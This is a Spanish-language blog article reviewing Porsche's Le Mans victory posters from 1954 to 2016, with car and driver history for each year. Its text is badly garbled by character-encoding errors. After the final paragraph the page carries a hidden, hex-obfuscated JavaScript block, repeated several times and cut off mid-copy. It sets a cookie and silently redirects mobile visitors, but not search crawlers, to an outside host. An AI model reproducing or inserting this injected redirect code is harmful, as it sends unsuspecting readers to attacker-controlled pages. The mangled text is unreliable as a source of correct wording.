Le Mans 2017: cuando las victorias se vuelven pA?ster

vadeRetro
4 - PORSCHE - 24h de Le Mans 1971
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

1 Porsche_919_Hybrid_2016

Los pA?sters de Porsche son una de las tradiciones mA?s bellas de la marca. Al observar cada imagen nos subimos a una mA?quina del tiempo y podemos viajar por la historia del automovilismo deportivo, degustando el sabor de las carreras de otras Ai??pocas, vistas a travAi??s de los ojos de artistas de ese tiempo.Ai??A travAi??s de estas grA?ficas incluso se puede rememorar el sonido de motores legendarios, el olor a neumA?ticos y combustibles purasangreai??i??

Veinte carteles victoriosos: dieciocho triunfos absolutos y dos de categorAi??a, que ilustran con acierto la Ai??pica de la competiciA?n. Autos, pilotos y competiciones mAi??ticas aparecen plasmados con belleza y de un modo artAi??stico, porque observando la estAi??tica de los pA?sters de Porsche se puede ver el legado de la marca, pero tambiAi??n la evoluciA?n del arte grA?fico de la segunda mitad del siglo XX y comienzos del XXI.

Todas las gestas de Porsche en el automovilismo deportivo se han plasmado en bellos carteles, desde aquellas primeras victorias de categorAi??a en grandes carreras o campeonatos de Europa durante los aAi??os 50. La Targa Florio, los 1.000 KilA?metros de NA?rburgring, la Carrera Panamericana, Sebring, Daytona, Spaai??i?? y, sobre todo, las 24 Horas de Le Mans, la prueba de resistencia por excelencia y en la que Porsche ha competido en todas sus ediciones desde 1951 y batido todos los rAi??cords.

1 - PORSCHE - 24h de Le Mans 1954

1954: Cuatro victorias en su categorAi??a

En 1954, tras la cuarta participaciA?n de Porsche en Le Mans, y la cuarta victoria en su categorAi??a, se creA? este precioso pA?ster dibujado a mano, con la leyenda ai???Porsche desde 1950 cada aAi??o victoriosa en la metaai???. Se aprovechA? para unir la conmemoraciA?n de los cuatro triunfos de Le Mans con las conseguidas en el Rallye de Suecia, llamado por entonces ai???Rallye del Sol de Medianocheai??i??.

8

1970: primera victoria absoluta

Probablemente el pA?ster mA?s conocido de Porsche sea el de la primera victoria absoluta en Le Mans. El mal tiempo de aquellos 13 y 14 de junio de 1970 nos privA? de fotos mA?s luminosas de ese histA?rico momento. Pero con un fondo negro se consiguiA? hacer destacar el 917K de color rojo del equipo Salzburg, ganador de la prueba con Hans Herrmann y Richard Attwood al volante, tras 3.434 vueltas al circuito. Fue una carrera dramA?tica y durAi??sima, en la que sA?lo unos pocos autos consiguieron llegar a meta.

3 - PORSCHE - 24h de Le Mans 1970

1970: Porsche tambiAi??n vence en ai???Grand Tourismeai??i??

Para Porsche todas las victorias y Ai??xitos son importantes. En 1970, no dudA? en celebrar con este pA?ster la victoria en la categorAi??a GT de este aparentemente inofensivo Porsche 914/6 de seis cilindros, que participA? en las 24 Horas de Le Mans para demostrar su versatilidad y eficacia a potenciales clientes. El Porsche 914/6 pilotado por Chasseuil-Ballot-Lena resistiA? entre la enorme cantidad de abandonos que provocA? la lluvia, en ocasiones torrencial, para pasar a los libros de historia.

4 - PORSCHE - 24h de Le Mans 1971

1971: La carrera de los rAi??cords

No sA?lo fue una segunda victoria consecutiva para Porsche, la de 1971 fue la carrera de los rAi??cords. El Porsche 917K de Marko/Van Lennep dio tantas vueltas al trazado de Le Mans que se tardarAi??an casi 40 aAi??os en superar los 5.335,313 km de distancia que recorrieron en esa ediciA?n, a una velocidad endemoniada. Y el 917K de MA?ller/Attwood, segundo en la meta, pudo haber recorrido aA?n mA?s distancia de no haber perdido 37 minutos en boxes por un problema mecA?nicoai??i??

A?A?Ai??Ai??

1976: Un triunfo aplastante

En 1976, volvieron los Ai??xitos de Porsche en Le Mans, gracias al ligero y fiable 936, que sumA? dos triunfos consecutivos en esta prueba. En la ediciA?n de 1976, el 936 que lideraba la prueba llevaba tanta ventaja al segundo clasificado, que los mecA?nicos pudieron reparar el escape durante 35 minutosai??i?? y aA?n asAi?? venciA? con mA?s de 100 kilA?metros de ventaja sobre su rival. ai???Nuestra victoria es tu beneficioai???, rezaba el pA?ster.

6 - PORSCHE - 24h de Le Mans 1977

1977: La segunda del 936

Segunda victoria del Porsche 936, aunque no con el mismo chasis, pero sAi?? con el genial Jackie Ickx de nuevo al volante. El belga comenzA? la prueba pilotando otro de los 936 del equipo Porsche, pero ese auto tuvo problemas e Ickx se uniA? al coche de Barth/Haywood. Este trAi??o controlA? hasta el final al Mirage que les perseguAi??a y cruzA? la meta victorioso.

A?A?A?A?

1979: El 935 vence a los prototipos

El Porsche 935 era el dominador de casi todas las carreras de resistencia en los aAi??os 70, pero se le resistAi??a el rapidAi??simo circuito de Le Mans, donde los prototipos tenAi??an ventaja. Hasta la ediciA?n de 1979, este espectacular coche, basado en el 911 turbo de calle, no tuvo oportunidad de vencer. Lo hizo con una versiA?n muy evolucionada del equipo Kremer, denominada 935 K3.Ai?? Los pilotos ganadores fueron Ludwig y Whittington, aunque de ese aAi??o casi se recuerda mA?s el segundo puesto del actor Paul Newman con otro 935, modelo que copA? las tres posiciones del podio.

8 - PORSCHE - 24h de Le Mans 1981

1981: El mA?gico regreso del 936

Porsche habAi??a producido tres unidades del prototipo 936; dos ya habAi??an ganado en Le Mans en las ediciones de 1976 y 1977. A?PodrAi??a ganar tambiAi??n el tercer chasis cuatro aAi??os mA?s tarde? Porsche demostrA? que con alguna evoluciA?n en el motor, la caja de cambios y la aerodinA?mica, su 936 seguAi??a siendo muy competitivo a pesar de su edad. La guinda del pastel fue el perfecto pilotaje de Jackie Ickx.

9 - PORSCHE - 24h de Le Mans 1982

1982: El brutal 956 de Grupo C

La llegada de la categorAi??a Grupo C, en 1982, modernizA? la parrilla de Le Mans de un plumazo. Porsche fue quien mejor interpretA? el nuevo reglamento con el espectacular 956, que combinaba una gran eficacia aerodinA?mica gracias al efecto suelo, con una relativa facilidad de conducciA?n. De nuevo, Porsche colocA? tres autos en las tres primeras posiciones de la carrera, con la legendaria pareja de pilotos Ickx-Bell al volante del Porsche 956 ganador. Con un sencillo pA?ster de bandas horizontales con los colores de la bandera francesa, en orden libre, se celebrA? el hat trick del equipo oficial Porsche de 1982.

10 - PORSCHE - 24h de Le Mans 1983

1983: Nadie es perfecto

Porsche dominaba con mano de hierro la disciplina, y 1983 fue un aAi??o muy especial. La victoria se luchA? hasta la A?ltima vuelta, que fue para Haywood, Holbert y Schuppan pilotando un Porsche 956, frente a la pareja formada por Ickx y Bell con idAi??ntica montura. Un aAi??o de rAi??cord, porque Porsche se llevA? nueve de los diez primeros puestos: todos con Porsche 956 salvo la novena plazaai??i?? nadie es perfecto. El cartel de 1983 nos muestra las mencionadas diez primeras posiciones, y el esplendor de la gran carrera con las tribunas llenas de pA?blico a punto de celebrar una nueva victoria de Porsche.

As

1984: Siete Porsche 956 en las siete primeras posiciones

En esta ediciA?n la competencia habAi??a recuperado terreno y en las primeras horas se viviA? una carrera muy competida. Pero Le Mans comienza a dictar sentencia en las A?ltimas horas de la prueba, en las que los Porsche 956 de diferentes equipos comenzaron a escalar posiciones hasta copar los siete primeros puestos finales. GanA? el 956 del equipo Porsche Joest, con dos grandes pilotos al volante: Henry Pescarolo y Klaus Ludwig. Fue la A?ltima victoria de una pareja de pilotos en la historia de Le Mans, pues a partir de entonces ya siempre han sido trAi??os.

A?K4A

1985: Un triunfo incontestable y el dAi??cimo de Porsche

La calidad del Porsche 956 quedaba demostrada con el segundo triunfo consecutivo, A?con el mismo chasis! En esta ocasiA?n, el trAi??o Ludwig/Barilla/Winter pilotA? el Porsche ganador del equipo Joest. Fue un triunfo casi sin oposiciA?n, pues lideraron 347 vueltas de las 373 de carrera y supuso la victoria nA?mero 10 de Porsche en Le Mans, hecho que conmemoraba el pA?ster de la Ai??poca.

13 - PORSCHE - 24h de Le Mans 1986

1986: Lucha fratricida entre dos Porsche

En 1986 se viviA? un apasionante duelo entre el 956 del equipo Joest (con Ludwig/Barilla/Winter al volante) y el nuevo 962C del equipo oficial Porsche, pilotado por el trAi??o Bell/Stuck/Holbert. La lucha fue espectacular y a la una de la maAi??ana habAi??a menos de un segundo de diferencia entre ellos. Una serie de accidentes y problemas mecA?nicos nos privaron de este duelo y el Porsche 962C con el nA?mero 1 se encaminA? hacia la victoria, seguido en la clasificaciA?n por el otro 962C del piloto argentino Oscar “Poppy” Larrauri, junto al espaAi??ol JesA?s Pareja y al francAi??s JAi??el Gouhier.

14 - PORSCHE - 24h de Le Mans 1987

1987: siete victorias consecutivas

En esta ediciA?n Porsche sumA? su sAi??ptima victoria consecutiva, pero la carrera no fue precisamente un camino de rosas. El equipo Jaguar era favorito tras lo visto en las primeras pruebas del mundial. Porsche perdiA? un auto en unos test en Weissach, otro en un entrenamiento en Le Mans y alguno mA?s en carrera. Pero las carreras en Le Mans se ganan, ademA?s de con velocidad, con experiencia, estrategia y evitando problemas. Al final, el trAi??o ganador de 1986 (Bell/Stuck/Holbert) volvAi??a a subir a lo mA?s alto del podio con el Porsche 962C del equipo oficial.

Ai??Ai??X

1994. Siete aAi??os despuAi??s, renace un increAi??ble 962C

El Porsche 962C tendrAi??a una A?ltima oportunidad A?siete aAi??os despuAi??s de su creaciA?n! Porsche explotA? con inteligencia el reglamento de GT1 y, a travAi??s Jochen Dauer, creA? una versiA?n del 962 que se podAi??a matricular e inscribiA? dos unidades dentro de esa categorAi??a. Dalmas/Haywood/Baldi pudieron contener la primera gran actuaciA?n de Toyota en esta ediciA?n y conseguir la victoria nA?mero trece para Porsche. El otro 962 finalizA? en tercera posiciA?n.

7A?Ai??

1996: Dos conceptos diferentes, dos nuevos triunfos

Dos autos en el pA?ster de 1996, el LMP1 TWR-Porsche WSC del equipo Joest, que se proclamA? ganador absoluto de la carrera, y el nuevo Porsche 911 GT1, segundo en la meta y ganador entre los LM GT1. Entre ambos sA?lo hubo una vuelta de diferencia al final de carrera, demostrando la efectividad de los nuevos superdeportivos GT1 basados en vehAi??culos de calle.

17 - PORSCHE - 24h de Le Mans 1997

1997: Una nueva victoria para el TWR-Porsche WRC

El TWR-Porsche WSC del equipo Joest Racing sumA? su segunda victoria consecutiva, esta vez luchando con los McLaren de la categorAi??a GT1. El joven danAi??s Tom Kristensen (que marcA? la vuelta rA?pida en carrera) estaba en el trAi??o de pilotos, junto a los pilotos de FA?rmula 1 Michele Alboreto y Stefan Johansson. En cuarta posiciA?n finalizA? un Porsche 935 y, en quinta, un 911 GT1.

18 - PORSCHE - 24h de Le Mans 1998

1998: El 911 GT1 reina en Le Mans

La ediciA?n de 1998 fue un hervidero de marcas y diferentes propuestas mecA?nicas. Pero fue un rediseAi??ado 911 GT1 del equipo oficial quien sumA? un doblete, con el trAi??o AA?ello-McNish-Ortelli en primera posiciA?n, y MA?ller-Alzen-Wollek en segundo lugar. Al acabar la carrera, Porsche anunciA? que se iba a tomar unos aAi??os sabA?ticos en la competiciA?n.

19 - PORSCHE - 24h de Le Mans 2015

2015: El retorno del Rey

Tras quince aAi??os dando servicio a los equipos que corren con diferentes modelos Porsche, pero sin competir de forma oficial por la victoria, Porsche regresa a las 24 Horas de Le Mans en 2014 con un equipo de fA?brica. El nuevo reglamento del WEC y la llegada de la hibridaciA?n anima a los ingenieros de la marca, que crean el tecnolA?gico 919 Hybrid. DespuAi??s de una primera participaciA?n, el 919 se afina para la ediciA?n de 2015, donde se impone con un nuevo doblete que los aficionados de la marca llevaban esperando desde hacAi??a mucho tiempo. El trAi??o de pilotos Bamber-Tandy-HA?lkenberg cruzA? la meta enAi??primera posiciA?n, mientras que Bernhard-Hartley-Webber subAi??an al segundo escalA?n del podio.

20 - PORSCHE Winning-poster_2016_Le-Mans_m

2016: Segunda victoria tecnolA?gica

La era de la hibridaciA?n motivA? mucho a los ingenieros de Porsche, y no contentos con el contundente doblete de 2015, mejoraron el 919 Hybrid, que volviA? a conseguir el ansiado triunfo. La de 2016 fue una emocionante ediciA?n luchada de poder a poder frente a Toyota y Audi, y fue la decimoctava victoria de Porsche en Le Mans, conseguida con Jani, Lieb y Dumas al volante. El cartel es como el auto, una demostraciA?n tecnolA?gica de vanguardia.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 